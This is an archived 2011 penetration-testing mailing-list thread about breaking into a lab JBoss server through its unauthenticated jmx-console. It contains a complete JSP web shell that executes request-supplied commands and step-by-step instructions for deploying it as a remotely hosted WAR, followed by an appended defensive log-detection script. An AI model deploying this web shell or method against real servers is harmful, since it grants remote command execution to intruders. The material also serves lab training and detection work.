Penetration Testing mailing list archives

Re: breaking jboss with a browser? not happening


From: Matt Gardenghi <mtgarden () gmail com>
Date: Thu, 20 Jan 2011 14:13:39 -0500

If you have access to the admin console, you have the box. I'm not at
my desk now, but if you google for a JBoss backdoor, you should find a
PDF detailing how and where to deploy it.

It works and on Windows you get (or can get) system privs.

Tell me if you need more and I'll try to dig through my files for the doc.

Matt

On Wednesday, January 19, 2011, Hembrow, Chris
<chris.hembrow () interserve com> wrote:
I've never tried deploying a WAR this way, and I've not used JBoss in a few years, but I'll try a few suggestions.
In the JBoss console, can you see a list of the deployed web apps somewhere?  This might let you see when/if
yours is deployed.

JBoss includes embedded Tomcat which handles the actual HTTP elements.  Creating the WAR is just packaging for
deployment; JSPs are compiled on the fly.  If there was an issue with your code you should get a 500 error, not
404.

Try deploying without the <servlet> block in the web.xml file; this shouldn't be necessary for a JSP page.  Also,
try including a regular HTML page (i.e. not JSP) in the WAR and accessing that.  This will rule out a compilation
issue.

HTH

Chris

(Sorry for top posting, but Outlook sucks)

-----Original Message-----
From: listbounce () securityfocus com [mailto:listbounce () securityfocus com] On Behalf Of lazers
Sent: 14 January 2011 20:03
To: pen-test () securityfocus com
Subject: breaking jboss with a browser? not happening

I have been given a task to break into a JBoss application by my senior sec manager at my company.
It's a hacking challenge staged in a test lab. This is what I have been given:
web access to JBoss.
Yes, that's pretty much it <3. He believes in the less-is-more philosophy, with some get-to-start-working info. I have been
told that a vulnerability exists in the application and it's no 0-day exploit, it's a known vulnerability. It is set as
an open-book challenge; I can get help anywhere I like. So what have I done so far?


Yes, I googled; but I also ran a Nessus scan and the scan brought me one HIGH vulnerability. It has to do with the
default JBoss installation using the JMX-Console. It's not a new vulnerability; I was able to reach this conclusion as
I started googling. This particular vulnerability is very popular; I was saying to myself that my problems were over and
I would break into JBoss in record time. But that has been largely untrue. Why? Well, if it weren't true I
wouldn't be here. I did the following (in steps):


attack vector: deployment scanner feature

1. Confirmed the default installation (by accessing localhost:9090); in my case it's
9090, not 8080 as in the hacking literature. Probably this is because I'm using a new version (idk the exact reason).

2. I wrote this JSP script (cmd.jsp) as told on sites:

<%@ page import="java.util.*,java.io.*"%>
<%
%>
<HTML><BODY>
Commands with JSP
<FORM METHOD="GET" NAME="myform" ACTION="">
<INPUT TYPE="text" NAME="cmd">
<INPUT TYPE="submit" VALUE="Send">
</FORM>
<pre>
<%
if (request.getParameter("cmd") != null) {
    out.println("Command: " + request.getParameter("cmd") + "<BR>");
    Process p = Runtime.getRuntime().exec(request.getParameter("cmd"));
    OutputStream os = p.getOutputStream();
    InputStream in = p.getInputStream();
    DataInputStream dis = new DataInputStream(in);
    String disr = dis.readLine();
    while ( disr != null ) {
        out.println(disr);
        disr = dis.readLine();
    }
}
%>
</pre>
</BODY></HTML>


3. Next I created a web.xml file to be placed in the WEB-INF folder:


<?xml version="1.0" ?>
<web-app xmlns="http://java.sun.com/xml/ns/j2ee"
    xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
    xsi:schemaLocation="http://java.sun.com/xml/ns/j2ee
    http://java.sun.com/xml/ns/j2ee/web-app_2_4.xsd"
    version="2.4">
  <servlet>
    <servlet-name>Command</servlet-name>
    <jsp-file>/cmd.jsp</jsp-file>
  </servlet>
</web-app>


4. I compiled the file cmd.jsp by placing the web.xml file in the WEB-INF folder:

jar cvf cmd.war WEB-INF cmd.jsp


5. I put this file on an Apache HTTP server. The file cmd.war resides in the htdocs folder. It can be accessed by URL:
mywebserver:80/cmd.war

6. I go back to the JBoss default page and navigate myself to the jboss.deployment page.

7. In the addURL tab I enter the path for my cmd.war file as
http://mywebserver/cmd.war

8. Next I go to the victim webserver in an attempt to access my uploaded application: http://victim:9090/cmd/cmd.jsp

9. I get HTTP STATUS 404 - /cmd/cmd.jsp

My app is supposed to be hot deployed by JBoss; b


------------------------------------------------------------------------
This list is sponsored by: Information Assurance Certification Review Board

Prove to peers and potential employers without a doubt that you can actually do a proper penetration test. IACRB CPT 
and CEPT certs require a full practical examination in order to become certified.

http://www.iacertification.org
------------------------------------------------------------------------



-- 
Matt Gardenghi
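Added example, not from any message in this thread: a Python detection script written from the defender's side, which reads JBoss/Tomcat access-log lines and flags the sequence lazers describes above, a client reaching the jmx-console and invoking the DeploymentScanner's addURL-style operation with a WAR hosted on another machine. Every log line, client address and the host name mywebserver is constructed; the assumption that the HtmlAdaptor parameters appear in the query string (a POST carries them in the body, which a standard access log does not record) is marked in the code.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Minimal parser for Tomcat/JBoss "common" access-log lines:
# host ident authuser [timestamp] "METHOD target HTTP/x.y" status size
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3}) (?P<size>\S+)$'
)

# Admin consoles that ship enabled, and unauthenticated, on older default JBoss installs.
ADMIN_PREFIXES = ("/jmx-console", "/web-console")

# Constructed sample log (not a real capture). The invokeOp parameters are shown in
# the query string as an assumption; a POST body would not appear in this log at all.
SAMPLE_LOG = """\
10.0.0.5 - - [14/Jan/2011:19:55:02 +0000] "GET /jmx-console/ HTTP/1.1" 200 4512
10.0.0.5 - - [14/Jan/2011:19:55:40 +0000] "GET /jmx-console/HtmlAdaptor?action=inspectMBean&name=jboss.deployment%3Atype%3DDeploymentScanner%2Cflavor%3DURL HTTP/1.1" 200 8120
10.0.0.5 - - [14/Jan/2011:19:56:10 +0000] "GET /jmx-console/HtmlAdaptor?action=invokeOp&name=jboss.deployment%3Atype%3DDeploymentScanner%2Cflavor%3DURL&arg0=http%3A%2F%2Fmywebserver%2Fcmd.war HTTP/1.1" 200 1200
10.0.0.5 - - [14/Jan/2011:19:56:35 +0000] "GET /cmd/cmd.jsp HTTP/1.1" 404 951
192.168.1.20 - - [14/Jan/2011:20:01:00 +0000] "GET /index.html HTTP/1.1" 200 2048
"""


def parse_line(line):
    """Parse one access-log line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    parts = urlsplit(rec["target"])
    rec["path"] = parts.path
    # parse_qs percent-decodes, so "%3A" becomes ":" and the MBean name is readable.
    rec["params"] = {k: v[0] for k, v in parse_qs(parts.query).items()}
    return rec


def classify(rec):
    """Return (severity, reason) for a parsed record, or None when it is not console traffic."""
    if not rec["path"].startswith(ADMIN_PREFIXES):
        return None
    params = rec["params"]
    name = params.get("name", "")
    if params.get("action") == "invokeOp":
        if "DeploymentScanner" in name:
            # Any argN holding an http(s) URL means "deploy this archive from that host".
            urls = [v for k, v in params.items()
                    if k.startswith("arg") and v.lower().startswith(("http://", "https://"))]
            if urls:
                return ("high", "remote WAR deployment via DeploymentScanner from "
                        + urlsplit(urls[0]).netloc)
            return ("high", "DeploymentScanner operation invoked")
        return ("medium", "MBean operation invoked on " + name)
    return ("low", "admin console accessed")


def scan(log_text):
    """Run every line through the parser and classifier; return the list of findings."""
    findings = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        verdict = classify(rec)
        if verdict:
            findings.append({"client": rec["host"], "ts": rec["ts"], "path": rec["path"],
                             "status": rec["status"], "severity": verdict[0],
                             "reason": verdict[1]})
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"{f['severity']:6} {f['client']:14} {f['ts']}  {f['reason']}")
```

Run it on a real access log by passing the file contents to scan(); the useful triage signal is a single client moving from "admin console accessed" to a high-severity DeploymentScanner call within a minute or two, which is exactly the pattern that a jmx-console left reachable without authentication makes possible. The 404 for /cmd/cmd.jsp in the sample is deliberately not flagged: it tells you nothing on its own, and the console calls before it are what matter.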
